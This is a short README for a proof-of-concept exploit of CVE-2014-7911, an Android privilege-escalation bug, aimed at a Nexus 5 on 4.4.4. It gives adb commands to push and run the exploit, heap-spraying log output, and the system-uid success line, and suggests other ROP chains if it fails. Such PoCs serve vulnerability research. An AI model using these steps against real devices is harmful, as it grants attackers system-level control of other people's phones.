Awesome

CVE-2014-7911

POC for CVE-2014-7911 for Nexus5 Android 4.4.4_r1 based on retme7, use different rop chain

#Info http://ele7enxxh.com/CVE-2014-7911-Detailed-Analysis-Of-Android-Local-Privilege-Escalation-To-System-Vulnerability.html

Usage

connect your phone via adb

adb push jni/expolit /data/local/tmp
adb logcat | grep auo_

lunch this poc, click the “CVE-2014-7911” button, you will see:

D/auo_CVE20147911(24892): staticAddr = 0x43a1f000
D/auo_CVE20147911(24892): heap sparying... 0
D/auo_CVE20147911(24892): heap sparying... 100
D/auo_CVE20147911(24892): heap sparying... 200
D/auo_CVE20147911(24892): heap sparying... 300
D/auo_CVE20147911(24892): heap sparying... 400
D/auo_CVE20147911(24892): heap sparying... 500
D/auo_CVE20147911(24892): heap sparying... 600
D/auo_CVE20147911(24892): heap sparying... 700
D/auo_CVE20147911(24892): heap sparying... 800
D/auo_CVE20147911(24892): heap sparying... 900
D/auo_CVE20147911(24892): heap sparying... 1000
D/auo_CVE20147911(24892): heap sparying... 1100
D/auo_CVE20147911(24892): heap sparying... 1200
D/auo_CVE20147911(24892): heap sparying... 1300
D/auo_CVE20147911(24892): heap sparying... 1400
D/auo_CVE20147911(24892): heap sparying... 1500
D/auo_CVE20147911(24892): heap sparying... 1600
D/auo_CVE20147911(24892): heap sparying... 1700
D/auo_CVE20147911(24892): heap sparying... 1800
D/auo_CVE20147911(24892): heap sparying... 1900

Then minimize activity several times until the system crashes, if you see:

D/auo_exploit(22665): uid=1000(system) gid=1000(system)

the exploit has succeeded, if your phone just crashes, your device is vulnerable the exploit may have failed(you should find diffent ROP chains).